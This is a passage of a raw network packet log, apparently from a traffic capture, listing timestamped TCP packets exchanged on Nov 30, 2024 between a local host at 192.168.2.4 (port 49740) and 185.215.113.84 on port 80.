                                                                                                                  Nov 30, 2024 01:55:26.423407078 CET8049740185.215.113.84192.168.2.4
                                                                                                                  Nov 30, 2024 01:55:26.423440933 CET4974080192.168.2.4185.215.113.84
                                                                                                                  Nov 30, 2024 01:55:26.424243927 CET8049740185.215.113.84192.168.2.4
                                                                                                                  Nov 30, 2024 01:55:26.424411058 CET8049740185.215.113.84192.168.2.4
                                                                                                                  Nov 30, 2024 01:55:26.424458981 CET4974080192.168.2.4185.215.113.84
                                                                                                                  Nov 30, 2024 01:55:26.425093889 CET8049740185.215.113.84192.168.2.4
                                                                                                                  Nov 30, 2024 01:55:26.425293922 CET8049740185.215.113.84192.168.2.4
                                                                                                                  Nov 30, 2024 01:55:26.425335884 CET4974080192.168.2.4185.215.113.84
                                                                                                                  Nov 30, 2024 01:55:26.425971031 CET8049740185.215.113.84192.168.2.4
                                                                                                                  Nov 30, 2024 01:55:26.426011086 CET4974080192.168.2.4185.215.113.84
                                                                                                                  Nov 30, 2024 01:55:26.426176071 CET8049740185.215.113.84192.168.2.4
                                                                                                                  Nov 30, 2024 01:55:26.426403999 CET4974080192.168.2.4185.215.113.84
                                                                                                                  Nov 30, 2024 01:55:26.426881075 CET8049740185.215.113.84192.168.2.4
                                                                                                                  Nov 30, 2024 01:55:26.427041054 CET8049740185.215.113.84192.168.2.4
                                                                                                                  Nov 30, 2024 01:55:26.427078009 CET4974080192.168.2.4185.215.113.84
                                                                                                                  Nov 30, 2024 01:55:26.427774906 CET8049740185.215.113.84192.168.2.4
                                                                                                                  Nov 30, 2024 01:55:26.427942038 CET8049740185.215.113.84192.168.2.4
                                                                                                                  Nov 30, 2024 01:55:26.427983046 CET4974080192.168.2.4185.215.113.84
                                                                                                                  Nov 30, 2024 01:55:26.428631067 CET8049740185.215.113.84192.168.2.4
                                                                                                                  Nov 30, 2024 01:55:26.428677082 CET4974080192.168.2.4185.215.113.84
                                                                                                                  Nov 30, 2024 01:55:26.428790092 CET8049740185.215.113.84192.168.2.4
                                                                                                                  Nov 30, 2024 01:55:26.429491043 CET8049740185.215.113.84192.168.2.4
                                                                                                                  Nov 30, 2024 01:55:26.429527998 CET4974080192.168.2.4185.215.113.84
                                                                                                                  Nov 30, 2024 01:55:26.429650068 CET8049740185.215.113.84192.168.2.4
                                                                                                                  Nov 30, 2024 01:55:26.430382013 CET8049740185.215.113.84192.168.2.4
                                                                                                                  Nov 30, 2024 01:55:26.430398941 CET4974080192.168.2.4185.215.113.84
                                                                                                                  Nov 30, 2024 01:55:26.430427074 CET4974080192.168.2.4185.215.113.84
                                                                                                                  Nov 30, 2024 01:55:26.430541992 CET8049740185.215.113.84192.168.2.4
                                                                                                                  Nov 30, 2024 01:55:26.430579901 CET4974080192.168.2.4185.215.113.84
                                                                                                                  Nov 30, 2024 01:55:26.431267023 CET8049740185.215.113.84192.168.2.4
                                                                                                                  Nov 30, 2024 01:55:26.431302071 CET4974080192.168.2.4185.215.113.84
                                                                                                                  Nov 30, 2024 01:55:26.431425095 CET8049740185.215.113.84192.168.2.4
                                                                                                                  Nov 30, 2024 01:55:26.431461096 CET4974080192.168.2.4185.215.113.84
                                                                                                                  Nov 30, 2024 01:55:26.432131052 CET8049740185.215.113.84192.168.2.4
                                                                                                                  Nov 30, 2024 01:55:26.432173014 CET4974080192.168.2.4185.215.113.84
                                                                                                                  Nov 30, 2024 01:55:26.432295084 CET8049740185.215.113.84192.168.2.4
                                                                                                                  Nov 30, 2024 01:55:26.432333946 CET4974080192.168.2.4185.215.113.84
                                                                                                                  Nov 30, 2024 01:55:26.432981968 CET8049740185.215.113.84192.168.2.4
                                                                                                                  Nov 30, 2024 01:55:26.433024883 CET4974080192.168.2.4185.215.113.84
                                                                                                                  Nov 30, 2024 01:55:26.433144093 CET8049740185.215.113.84192.168.2.4
                                                                                                                  Nov 30, 2024 01:55:26.433872938 CET8049740185.215.113.84192.168.2.4
                                                                                                                  Nov 30, 2024 01:55:26.433876991 CET4974080192.168.2.4185.215.113.84
                                                                                                                  Nov 30, 2024 01:55:26.434015036 CET8049740185.215.113.84192.168.2.4
                                                                                                                  Nov 30, 2024 01:55:26.434052944 CET4974080192.168.2.4185.215.113.84
                                                                                                                  Nov 30, 2024 01:55:26.434732914 CET8049740185.215.113.84192.168.2.4
                                                                                                                  Nov 30, 2024 01:55:26.434906006 CET8049740185.215.113.84192.168.2.4
                                                                                                                  Nov 30, 2024 01:55:26.434945107 CET4974080192.168.2.4185.215.113.84
                                                                                                                  Nov 30, 2024 01:55:26.435693979 CET8049740185.215.113.84192.168.2.4
                                                                                                                  Nov 30, 2024 01:55:26.435941935 CET8049740185.215.113.84192.168.2.4
                                                                                                                  Nov 30, 2024 01:55:26.435976982 CET4974080192.168.2.4185.215.113.84
                                                                                                                  Nov 30, 2024 01:55:26.436499119 CET8049740185.215.113.84192.168.2.4
                                                                                                                  Nov 30, 2024 01:55:26.436537981 CET4974080192.168.2.4185.215.113.84
                                                                                                                  Nov 30, 2024 01:55:26.436625957 CET8049740185.215.113.84192.168.2.4
                                                                                                                  Nov 30, 2024 01:55:26.437179089 CET4974080192.168.2.4185.215.113.84
                                                                                                                  Nov 30, 2024 01:55:26.437352896 CET8049740185.215.113.84192.168.2.4
                                                                                                                  Nov 30, 2024 01:55:26.437402964 CET4974080192.168.2.4185.215.113.84
                                                                                                                  Nov 30, 2024 01:55:26.437536001 CET8049740185.215.113.84192.168.2.4
                                                                                                                  Nov 30, 2024 01:55:26.437577963 CET4974080192.168.2.4185.215.113.84
                                                                                                                  Nov 30, 2024 01:55:26.438226938 CET8049740185.215.113.84192.168.2.4
                                                                                                                  Nov 30, 2024 01:55:26.438266993 CET4974080192.168.2.4185.215.113.84
                                                                                                                  Nov 30, 2024 01:55:26.438395977 CET8049740185.215.113.84192.168.2.4
                                                                                                                  Nov 30, 2024 01:55:26.439122915 CET8049740185.215.113.84192.168.2.4
                                                                                                                  Nov 30, 2024 01:55:26.439162016 CET4974080192.168.2.4185.215.113.84
                                                                                                                  Nov 30, 2024 01:55:26.439271927 CET8049740185.215.113.84192.168.2.4
                                                                                                                  Nov 30, 2024 01:55:26.440030098 CET8049740185.215.113.84192.168.2.4
                                                                                                                  Nov 30, 2024 01:55:26.440068960 CET4974080192.168.2.4185.215.113.84
                                                                                                                  Nov 30, 2024 01:55:26.440143108 CET8049740185.215.113.84192.168.2.4
                                                                                                                  Nov 30, 2024 01:55:26.440175056 CET4974080192.168.2.4185.215.113.84
                                                                                                                  Nov 30, 2024 01:55:26.440896034 CET8049740185.215.113.84192.168.2.4
                                                                                                                  Nov 30, 2024 01:55:26.441042900 CET8049740185.215.113.84192.168.2.4
                                                                                                                  Nov 30, 2024 01:55:26.441076994 CET4974080192.168.2.4185.215.113.84
                                                                                                                  Nov 30, 2024 01:55:26.441752911 CET8049740185.215.113.84192.168.2.4
                                                                                                                  Nov 30, 2024 01:55:26.441910028 CET8049740185.215.113.84192.168.2.4
                                                                                                                  Nov 30, 2024 01:55:26.441952944 CET4974080192.168.2.4185.215.113.84
                                                                                                                  Nov 30, 2024 01:55:26.442634106 CET8049740185.215.113.84192.168.2.4
                                                                                                                  Nov 30, 2024 01:55:26.442671061 CET4974080192.168.2.4185.215.113.84
                                                                                                                  Nov 30, 2024 01:55:26.442770958 CET8049740185.215.113.84192.168.2.4
                                                                                                                  Nov 30, 2024 01:55:26.442804098 CET4974080192.168.2.4185.215.113.84
                                                                                                                  Nov 30, 2024 01:55:26.443483114 CET8049740185.215.113.84192.168.2.4
                                                                                                                  Nov 30, 2024 01:55:26.443530083 CET4974080192.168.2.4185.215.113.84
                                                                                                                  Nov 30, 2024 01:55:26.443631887 CET8049740185.215.113.84192.168.2.4
                                                                                                                  Nov 30, 2024 01:55:26.443670034 CET4974080192.168.2.4185.215.113.84
                                                                                                                  Nov 30, 2024 01:55:26.444386005 CET8049740185.215.113.84192.168.2.4
                                                                                                                  Nov 30, 2024 01:55:26.444426060 CET4974080192.168.2.4185.215.113.84
                                                                                                                  Nov 30, 2024 01:55:26.444525957 CET8049740185.215.113.84192.168.2.4
                                                                                                                  Nov 30, 2024 01:55:26.444565058 CET4974080192.168.2.4185.215.113.84
                                                                                                                  Nov 30, 2024 01:55:26.445205927 CET8049740185.215.113.84192.168.2.4
                                                                                                                  Nov 30, 2024 01:55:26.445245028 CET4974080192.168.2.4185.215.113.84
                                                                                                                  Nov 30, 2024 01:55:26.445365906 CET8049740185.215.113.84192.168.2.4
                                                                                                                  Nov 30, 2024 01:55:26.445401907 CET4974080192.168.2.4185.215.113.84
                                                                                                                  Nov 30, 2024 01:55:26.446084976 CET8049740185.215.113.84192.168.2.4
                                                                                                                  Nov 30, 2024 01:55:26.446121931 CET4974080192.168.2.4185.215.113.84
                                                                                                                  Nov 30, 2024 01:55:26.446243048 CET8049740185.215.113.84192.168.2.4
                                                                                                                  Nov 30, 2024 01:55:26.446280003 CET4974080192.168.2.4185.215.113.84
                                                                                                                  Nov 30, 2024 01:55:26.446953058 CET8049740185.215.113.84192.168.2.4
                                                                                                                  Nov 30, 2024 01:55:26.446985960 CET4974080192.168.2.4185.215.113.84
                                                                                                                  Nov 30, 2024 01:55:26.447132111 CET8049740185.215.113.84192.168.2.4
                                                                                                                  Nov 30, 2024 01:55:26.447166920 CET4974080192.168.2.4185.215.113.84
                                                                                                                  Nov 30, 2024 01:55:26.447824001 CET8049740185.215.113.84192.168.2.4
                                                                                                                  Nov 30, 2024 01:55:26.447861910 CET4974080192.168.2.4185.215.113.84
                                                                                                                  Nov 30, 2024 01:55:26.447988033 CET8049740185.215.113.84192.168.2.4
                                                                                                                  Nov 30, 2024 01:55:26.448026896 CET4974080192.168.2.4185.215.113.84
                                                                                                                  Nov 30, 2024 01:55:26.448726892 CET8049740185.215.113.84192.168.2.4
                                                                                                                  Nov 30, 2024 01:55:26.448771000 CET4974080192.168.2.4185.215.113.84
                                                                                                                  Nov 30, 2024 01:55:26.448868036 CET8049740185.215.113.84192.168.2.4
                                                                                                                  Nov 30, 2024 01:55:26.448908091 CET4974080192.168.2.4185.215.113.84
                                                                                                                  Nov 30, 2024 01:55:26.449580908 CET8049740185.215.113.84192.168.2.4
                                                                                                                  Nov 30, 2024 01:55:26.449623108 CET4974080192.168.2.4185.215.113.84
                                                                                                                  Nov 30, 2024 01:55:26.449731112 CET8049740185.215.113.84192.168.2.4
                                                                                                                  Nov 30, 2024 01:55:26.449767113 CET4974080192.168.2.4185.215.113.84
                                                                                                                  Nov 30, 2024 01:55:26.450491905 CET8049740185.215.113.84192.168.2.4
                                                                                                                  Nov 30, 2024 01:55:26.450540066 CET4974080192.168.2.4185.215.113.84
                                                                                                                  Nov 30, 2024 01:55:26.450655937 CET8049740185.215.113.84192.168.2.4
                                                                                                                  Nov 30, 2024 01:55:26.450692892 CET4974080192.168.2.4185.215.113.84
                                                                                                                  Nov 30, 2024 01:55:26.451328039 CET8049740185.215.113.84192.168.2.4
                                                                                                                  Nov 30, 2024 01:55:26.451363087 CET4974080192.168.2.4185.215.113.84
                                                                                                                  Nov 30, 2024 01:55:26.451498985 CET8049740185.215.113.84192.168.2.4
                                                                                                                  Nov 30, 2024 01:55:26.451536894 CET4974080192.168.2.4185.215.113.84
                                                                                                                  Nov 30, 2024 01:55:26.452235937 CET8049740185.215.113.84192.168.2.4
                                                                                                                  Nov 30, 2024 01:55:26.452276945 CET4974080192.168.2.4185.215.113.84
                                                                                                                  Nov 30, 2024 01:55:26.452385902 CET8049740185.215.113.84192.168.2.4
                                                                                                                  Nov 30, 2024 01:55:26.452428102 CET4974080192.168.2.4185.215.113.84
                                                                                                                  Nov 30, 2024 01:55:26.453082085 CET8049740185.215.113.84192.168.2.4
                                                                                                                  Nov 30, 2024 01:55:26.453133106 CET4974080192.168.2.4185.215.113.84
                                                                                                                  Nov 30, 2024 01:55:26.453226089 CET8049740185.215.113.84192.168.2.4
                                                                                                                  Nov 30, 2024 01:55:26.453263998 CET4974080192.168.2.4185.215.113.84
                                                                                                                  Nov 30, 2024 01:55:26.453974009 CET8049740185.215.113.84192.168.2.4
                                                                                                                  Nov 30, 2024 01:55:26.454010963 CET4974080192.168.2.4185.215.113.84
                                                                                                                  Nov 30, 2024 01:55:26.454118013 CET8049740185.215.113.84192.168.2.4
                                                                                                                  Nov 30, 2024 01:55:26.454153061 CET4974080192.168.2.4185.215.113.84
                                                                                                                  Nov 30, 2024 01:55:26.454857111 CET8049740185.215.113.84192.168.2.4
                                                                                                                  Nov 30, 2024 01:55:26.454890013 CET4974080192.168.2.4185.215.113.84
                                                                                                                  Nov 30, 2024 01:55:26.455005884 CET8049740185.215.113.84192.168.2.4
                                                                                                                  Nov 30, 2024 01:55:26.455039978 CET4974080192.168.2.4185.215.113.84
                                                                                                                  Nov 30, 2024 01:55:26.455709934 CET8049740185.215.113.84192.168.2.4
                                                                                                                  Nov 30, 2024 01:55:26.455749035 CET4974080192.168.2.4185.215.113.84
                                                                                                                  Nov 30, 2024 01:55:26.455842018 CET8049740185.215.113.84192.168.2.4
                                                                                                                  Nov 30, 2024 01:55:26.455877066 CET4974080192.168.2.4185.215.113.84
                                                                                                                  Nov 30, 2024 01:55:26.456608057 CET8049740185.215.113.84192.168.2.4
                                                                                                                  Nov 30, 2024 01:55:26.456641912 CET4974080192.168.2.4185.215.113.84
                                                                                                                  Nov 30, 2024 01:55:26.456759930 CET8049740185.215.113.84192.168.2.4
                                                                                                                  Nov 30, 2024 01:55:26.456796885 CET4974080192.168.2.4185.215.113.84
                                                                                                                  Nov 30, 2024 01:55:26.457448959 CET8049740185.215.113.84192.168.2.4
                                                                                                                  Nov 30, 2024 01:55:26.457494020 CET4974080192.168.2.4185.215.113.84
                                                                                                                  Nov 30, 2024 01:55:26.457611084 CET8049740185.215.113.84192.168.2.4
                                                                                                                  Nov 30, 2024 01:55:26.457645893 CET4974080192.168.2.4185.215.113.84
                                                                                                                  Nov 30, 2024 01:55:26.458328009 CET8049740185.215.113.84192.168.2.4
                                                                                                                  Nov 30, 2024 01:55:26.458369017 CET4974080192.168.2.4185.215.113.84
                                                                                                                  Nov 30, 2024 01:55:26.458482981 CET8049740185.215.113.84192.168.2.4
                                                                                                                  Nov 30, 2024 01:55:26.458523035 CET4974080192.168.2.4185.215.113.84
                                                                                                                  Nov 30, 2024 01:55:26.459193945 CET8049740185.215.113.84192.168.2.4
                                                                                                                  Nov 30, 2024 01:55:26.459229946 CET4974080192.168.2.4185.215.113.84
                                                                                                                  Nov 30, 2024 01:55:26.459319115 CET8049740185.215.113.84192.168.2.4
                                                                                                                  Nov 30, 2024 01:55:26.459355116 CET4974080192.168.2.4185.215.113.84
                                                                                                                  Nov 30, 2024 01:55:26.612828016 CET8049740185.215.113.84192.168.2.4
                                                                                                                  Nov 30, 2024 01:55:26.612900019 CET4974080192.168.2.4185.215.113.84
                                                                                                                  Nov 30, 2024 01:55:26.612946033 CET8049740185.215.113.84192.168.2.4
                                                                                                                  Nov 30, 2024 01:55:26.613004923 CET4974080192.168.2.4185.215.113.84
                                                                                                                  Nov 30, 2024 01:55:26.613219976 CET8049740185.215.113.84192.168.2.4
                                                                                                                  Nov 30, 2024 01:55:26.613259077 CET4974080192.168.2.4185.215.113.84
                                                                                                                  Nov 30, 2024 01:55:26.613507032 CET8049740185.215.113.84192.168.2.4
                                                                                                                  Nov 30, 2024 01:55:26.613547087 CET4974080192.168.2.4185.215.113.84
                                                                                                                  Nov 30, 2024 01:55:26.614059925 CET8049740185.215.113.84192.168.2.4
                                                                                                                  Nov 30, 2024 01:55:26.614104033 CET4974080192.168.2.4185.215.113.84
                                                                                                                  Nov 30, 2024 01:55:26.614185095 CET8049740185.215.113.84192.168.2.4
                                                                                                                  Nov 30, 2024 01:55:26.614226103 CET4974080192.168.2.4185.215.113.84
                                                                                                                  Nov 30, 2024 01:55:26.614885092 CET8049740185.215.113.84192.168.2.4
                                                                                                                  Nov 30, 2024 01:55:26.614924908 CET4974080192.168.2.4185.215.113.84
                                                                                                                  Nov 30, 2024 01:55:26.615160942 CET8049740185.215.113.84192.168.2.4
                                                                                                                  Nov 30, 2024 01:55:26.615199089 CET4974080192.168.2.4185.215.113.84
                                                                                                                  Nov 30, 2024 01:55:26.615323067 CET8049740185.215.113.84192.168.2.4
                                                                                                                  Nov 30, 2024 01:55:26.615362883 CET4974080192.168.2.4185.215.113.84
                                                                                                                  Nov 30, 2024 01:55:26.616045952 CET8049740185.215.113.84192.168.2.4
                                                                                                                  Nov 30, 2024 01:55:26.616086006 CET4974080192.168.2.4185.215.113.84
                                                                                                                  Nov 30, 2024 01:55:26.616199970 CET8049740185.215.113.84192.168.2.4
                                                                                                                  Nov 30, 2024 01:55:26.616250038 CET4974080192.168.2.4185.215.113.84
                                                                                                                  Nov 30, 2024 01:55:26.616919041 CET8049740185.215.113.84192.168.2.4
                                                                                                                  Nov 30, 2024 01:55:26.616955042 CET4974080192.168.2.4185.215.113.84
                                                                                                                  Nov 30, 2024 01:55:26.617090940 CET8049740185.215.113.84192.168.2.4
                                                                                                                  Nov 30, 2024 01:55:26.617130041 CET4974080192.168.2.4185.215.113.84
                                                                                                                  Nov 30, 2024 01:55:26.617798090 CET8049740185.215.113.84192.168.2.4
                                                                                                                  Nov 30, 2024 01:55:26.617837906 CET4974080192.168.2.4185.215.113.84
                                                                                                                  Nov 30, 2024 01:55:26.617921114 CET8049740185.215.113.84192.168.2.4
                                                                                                                  Nov 30, 2024 01:55:26.617955923 CET4974080192.168.2.4185.215.113.84
                                                                                                                  Nov 30, 2024 01:55:26.618649960 CET8049740185.215.113.84192.168.2.4
                                                                                                                  Nov 30, 2024 01:55:26.618690014 CET4974080192.168.2.4185.215.113.84
                                                                                                                  Nov 30, 2024 01:55:26.618808031 CET8049740185.215.113.84192.168.2.4
                                                                                                                  Nov 30, 2024 01:55:26.618844986 CET4974080192.168.2.4185.215.113.84
                                                                                                                  Nov 30, 2024 01:55:26.619533062 CET8049740185.215.113.84192.168.2.4
                                                                                                                  Nov 30, 2024 01:55:26.619571924 CET4974080192.168.2.4185.215.113.84
                                                                                                                  Nov 30, 2024 01:55:26.619700909 CET8049740185.215.113.84192.168.2.4
                                                                                                                  Nov 30, 2024 01:55:26.619740963 CET4974080192.168.2.4185.215.113.84
                                                                                                                  Nov 30, 2024 01:55:26.620395899 CET8049740185.215.113.84192.168.2.4
                                                                                                                  Nov 30, 2024 01:55:26.620434046 CET4974080192.168.2.4185.215.113.84
                                                                                                                  Nov 30, 2024 01:55:26.620575905 CET8049740185.215.113.84192.168.2.4
                                                                                                                  Nov 30, 2024 01:55:26.620615005 CET4974080192.168.2.4185.215.113.84
                                                                                                                  Nov 30, 2024 01:55:26.621273041 CET8049740185.215.113.84192.168.2.4
                                                                                                                  Nov 30, 2024 01:55:26.621313095 CET4974080192.168.2.4185.215.113.84
                                                                                                                  Nov 30, 2024 01:55:26.621419907 CET8049740185.215.113.84192.168.2.4
                                                                                                                  Nov 30, 2024 01:55:26.621460915 CET4974080192.168.2.4185.215.113.84
                                                                                                                  Nov 30, 2024 01:55:26.622138977 CET8049740185.215.113.84192.168.2.4
                                                                                                                  Nov 30, 2024 01:55:26.622178078 CET4974080192.168.2.4185.215.113.84
                                                                                                                  Nov 30, 2024 01:55:26.622299910 CET8049740185.215.113.84192.168.2.4
                                                                                                                  Nov 30, 2024 01:55:26.622337103 CET4974080192.168.2.4185.215.113.84
                                                                                                                  Nov 30, 2024 01:55:26.623028040 CET8049740185.215.113.84192.168.2.4
                                                                                                                  Nov 30, 2024 01:55:26.623064041 CET4974080192.168.2.4185.215.113.84
                                                                                                                  Nov 30, 2024 01:55:26.623184919 CET8049740185.215.113.84192.168.2.4
                                                                                                                  Nov 30, 2024 01:55:26.623223066 CET4974080192.168.2.4185.215.113.84
                                                                                                                  Nov 30, 2024 01:55:26.623898029 CET8049740185.215.113.84192.168.2.4
                                                                                                                  Nov 30, 2024 01:55:26.623936892 CET4974080192.168.2.4185.215.113.84
                                                                                                                  Nov 30, 2024 01:55:26.624067068 CET8049740185.215.113.84192.168.2.4
                                                                                                                  Nov 30, 2024 01:55:26.624109983 CET4974080192.168.2.4185.215.113.84
                                                                                                                  Nov 30, 2024 01:55:26.624780893 CET8049740185.215.113.84192.168.2.4
                                                                                                                  Nov 30, 2024 01:55:26.624830961 CET4974080192.168.2.4185.215.113.84
                                                                                                                  Nov 30, 2024 01:55:26.624939919 CET8049740185.215.113.84192.168.2.4
                                                                                                                  Nov 30, 2024 01:55:26.624974012 CET4974080192.168.2.4185.215.113.84
                                                                                                                  Nov 30, 2024 01:55:26.625639915 CET8049740185.215.113.84192.168.2.4
                                                                                                                  Nov 30, 2024 01:55:26.625679016 CET4974080192.168.2.4185.215.113.84
                                                                                                                  Nov 30, 2024 01:55:26.625854969 CET8049740185.215.113.84192.168.2.4
                                                                                                                  Nov 30, 2024 01:55:26.625891924 CET4974080192.168.2.4185.215.113.84
                                                                                                                  Nov 30, 2024 01:55:26.626547098 CET8049740185.215.113.84192.168.2.4
                                                                                                                  Nov 30, 2024 01:55:26.626589060 CET4974080192.168.2.4185.215.113.84
                                                                                                                  Nov 30, 2024 01:55:26.626842976 CET8049740185.215.113.84192.168.2.4
                                                                                                                  Nov 30, 2024 01:55:26.626883030 CET4974080192.168.2.4185.215.113.84
                                                                                                                  Nov 30, 2024 01:55:26.627407074 CET8049740185.215.113.84192.168.2.4
                                                                                                                  Nov 30, 2024 01:55:26.627451897 CET4974080192.168.2.4185.215.113.84
                                                                                                                  Nov 30, 2024 01:55:26.627578020 CET8049740185.215.113.84192.168.2.4
                                                                                                                  Nov 30, 2024 01:55:26.627616882 CET4974080192.168.2.4185.215.113.84
                                                                                                                  Nov 30, 2024 01:55:26.628292084 CET8049740185.215.113.84192.168.2.4
                                                                                                                  Nov 30, 2024 01:55:26.628329039 CET4974080192.168.2.4185.215.113.84
                                                                                                                  Nov 30, 2024 01:55:26.628447056 CET8049740185.215.113.84192.168.2.4
                                                                                                                  Nov 30, 2024 01:55:26.628484964 CET4974080192.168.2.4185.215.113.84
                                                                                                                  Nov 30, 2024 01:55:26.629127979 CET8049740185.215.113.84192.168.2.4
                                                                                                                  Nov 30, 2024 01:55:26.629165888 CET4974080192.168.2.4185.215.113.84
                                                                                                                  Nov 30, 2024 01:55:26.629326105 CET8049740185.215.113.84192.168.2.4
                                                                                                                  Nov 30, 2024 01:55:26.629367113 CET4974080192.168.2.4185.215.113.84
                                                                                                                  Nov 30, 2024 01:55:26.630050898 CET8049740185.215.113.84192.168.2.4
                                                                                                                  Nov 30, 2024 01:55:26.630091906 CET4974080192.168.2.4185.215.113.84
                                                                                                                  Nov 30, 2024 01:55:26.630202055 CET8049740185.215.113.84192.168.2.4
                                                                                                                  Nov 30, 2024 01:55:26.630242109 CET4974080192.168.2.4185.215.113.84
                                                                                                                  Nov 30, 2024 01:55:26.630884886 CET8049740185.215.113.84192.168.2.4
                                                                                                                  Nov 30, 2024 01:55:26.630923986 CET4974080192.168.2.4185.215.113.84
                                                                                                                  Nov 30, 2024 01:55:26.631134033 CET8049740185.215.113.84192.168.2.4
                                                                                                                  Nov 30, 2024 01:55:26.631170034 CET4974080192.168.2.4185.215.113.84
                                                                                                                  Nov 30, 2024 01:55:26.631799936 CET8049740185.215.113.84192.168.2.4
                                                                                                                  Nov 30, 2024 01:55:26.631834030 CET4974080192.168.2.4185.215.113.84
                                                                                                                  Nov 30, 2024 01:55:26.631949902 CET8049740185.215.113.84192.168.2.4
                                                                                                                  Nov 30, 2024 01:55:26.631987095 CET4974080192.168.2.4185.215.113.84
                                                                                                                  Nov 30, 2024 01:55:26.632693052 CET8049740185.215.113.84192.168.2.4
                                                                                                                  Nov 30, 2024 01:55:26.632730007 CET4974080192.168.2.4185.215.113.84
                                                                                                                  Nov 30, 2024 01:55:26.632849932 CET8049740185.215.113.84192.168.2.4
                                                                                                                  Nov 30, 2024 01:55:26.632889032 CET4974080192.168.2.4185.215.113.84
                                                                                                                  Nov 30, 2024 01:55:26.633544922 CET8049740185.215.113.84192.168.2.4
                                                                                                                  Nov 30, 2024 01:55:26.633583069 CET4974080192.168.2.4185.215.113.84
                                                                                                                  Nov 30, 2024 01:55:26.633733034 CET8049740185.215.113.84192.168.2.4
                                                                                                                  Nov 30, 2024 01:55:26.633769035 CET4974080192.168.2.4185.215.113.84
                                                                                                                  Nov 30, 2024 01:55:26.634419918 CET8049740185.215.113.84192.168.2.4
                                                                                                                  Nov 30, 2024 01:55:26.634459972 CET4974080192.168.2.4185.215.113.84
                                                                                                                  Nov 30, 2024 01:55:26.634624004 CET8049740185.215.113.84192.168.2.4
                                                                                                                  Nov 30, 2024 01:55:26.634660006 CET4974080192.168.2.4185.215.113.84
                                                                                                                  Nov 30, 2024 01:55:26.635277033 CET8049740185.215.113.84192.168.2.4
                                                                                                                  Nov 30, 2024 01:55:26.635315895 CET4974080192.168.2.4185.215.113.84
                                                                                                                  Nov 30, 2024 01:55:26.635481119 CET8049740185.215.113.84192.168.2.4
                                                                                                                  Nov 30, 2024 01:55:26.635521889 CET4974080192.168.2.4185.215.113.84
                                                                                                                  Nov 30, 2024 01:55:26.636145115 CET8049740185.215.113.84192.168.2.4
                                                                                                                  Nov 30, 2024 01:55:26.636182070 CET4974080192.168.2.4185.215.113.84
                                                                                                                  Nov 30, 2024 01:55:26.636293888 CET8049740185.215.113.84192.168.2.4
                                                                                                                  Nov 30, 2024 01:55:26.636334896 CET4974080192.168.2.4185.215.113.84
                                                                                                                  Nov 30, 2024 01:55:26.637007952 CET8049740185.215.113.84192.168.2.4
                                                                                                                  Nov 30, 2024 01:55:26.637059927 CET4974080192.168.2.4185.215.113.84
                                                                                                                  Nov 30, 2024 01:55:26.637182951 CET8049740185.215.113.84192.168.2.4
                                                                                                                  Nov 30, 2024 01:55:26.637229919 CET4974080192.168.2.4185.215.113.84
                                                                                                                  Nov 30, 2024 01:55:26.637875080 CET8049740185.215.113.84192.168.2.4
                                                                                                                  Nov 30, 2024 01:55:26.637922049 CET4974080192.168.2.4185.215.113.84
                                                                                                                  Nov 30, 2024 01:55:26.638026953 CET8049740185.215.113.84192.168.2.4
                                                                                                                  Nov 30, 2024 01:55:26.638063908 CET4974080192.168.2.4185.215.113.84
                                                                                                                  Nov 30, 2024 01:55:26.638766050 CET8049740185.215.113.84192.168.2.4
                                                                                                                  Nov 30, 2024 01:55:26.638813019 CET4974080192.168.2.4185.215.113.84
                                                                                                                  Nov 30, 2024 01:55:26.638890982 CET8049740185.215.113.84192.168.2.4
                                                                                                                  Nov 30, 2024 01:55:26.638930082 CET4974080192.168.2.4185.215.113.84
                                                                                                                  Nov 30, 2024 01:55:26.639636993 CET8049740185.215.113.84192.168.2.4
                                                                                                                  Nov 30, 2024 01:55:26.639681101 CET4974080192.168.2.4185.215.113.84
                                                                                                                  Nov 30, 2024 01:55:26.639800072 CET8049740185.215.113.84192.168.2.4
                                                                                                                  Nov 30, 2024 01:55:26.639842033 CET4974080192.168.2.4185.215.113.84
                                                                                                                  Nov 30, 2024 01:55:26.640502930 CET8049740185.215.113.84192.168.2.4
                                                                                                                  Nov 30, 2024 01:55:26.640546083 CET4974080192.168.2.4185.215.113.84
                                                                                                                  Nov 30, 2024 01:55:26.640738010 CET8049740185.215.113.84192.168.2.4
                                                                                                                  Nov 30, 2024 01:55:26.640780926 CET4974080192.168.2.4185.215.113.84
                                                                                                                  Nov 30, 2024 01:55:26.641367912 CET8049740185.215.113.84192.168.2.4
                                                                                                                  Nov 30, 2024 01:55:26.641422033 CET4974080192.168.2.4185.215.113.84
                                                                                                                  Nov 30, 2024 01:55:26.641536951 CET8049740185.215.113.84192.168.2.4
                                                                                                                  Nov 30, 2024 01:55:26.641582012 CET4974080192.168.2.4185.215.113.84
                                                                                                                  Nov 30, 2024 01:55:26.642254114 CET8049740185.215.113.84192.168.2.4
                                                                                                                  Nov 30, 2024 01:55:26.642302036 CET4974080192.168.2.4185.215.113.84
                                                                                                                  Nov 30, 2024 01:55:26.642419100 CET8049740185.215.113.84192.168.2.4
                                                                                                                  Nov 30, 2024 01:55:26.642465115 CET4974080192.168.2.4185.215.113.84
                                                                                                                  Nov 30, 2024 01:55:26.643114090 CET8049740185.215.113.84192.168.2.4
                                                                                                                  Nov 30, 2024 01:55:26.643163919 CET4974080192.168.2.4185.215.113.84
                                                                                                                  Nov 30, 2024 01:55:26.643280983 CET8049740185.215.113.84192.168.2.4
                                                                                                                  Nov 30, 2024 01:55:26.643332005 CET4974080192.168.2.4185.215.113.84
                                                                                                                  Nov 30, 2024 01:55:26.643996000 CET8049740185.215.113.84192.168.2.4
                                                                                                                  Nov 30, 2024 01:55:26.644063950 CET4974080192.168.2.4185.215.113.84
                                                                                                                  Nov 30, 2024 01:55:26.644226074 CET8049740185.215.113.84192.168.2.4
                                                                                                                  Nov 30, 2024 01:55:26.644309044 CET4974080192.168.2.4185.215.113.84
                                                                                                                  Nov 30, 2024 01:55:26.644871950 CET8049740185.215.113.84192.168.2.4
                                                                                                                  Nov 30, 2024 01:55:26.644982100 CET4974080192.168.2.4185.215.113.84
                                                                                                                  Nov 30, 2024 01:55:26.645046949 CET8049740185.215.113.84192.168.2.4
                                                                                                                  Nov 30, 2024 01:55:26.645097017 CET4974080192.168.2.4185.215.113.84
                                                                                                                  Nov 30, 2024 01:55:26.645754099 CET8049740185.215.113.84192.168.2.4
                                                                                                                  Nov 30, 2024 01:55:26.645829916 CET4974080192.168.2.4185.215.113.84
                                                                                                                  Nov 30, 2024 01:55:26.645905018 CET8049740185.215.113.84192.168.2.4
                                                                                                                  Nov 30, 2024 01:55:26.645945072 CET4974080192.168.2.4185.215.113.84
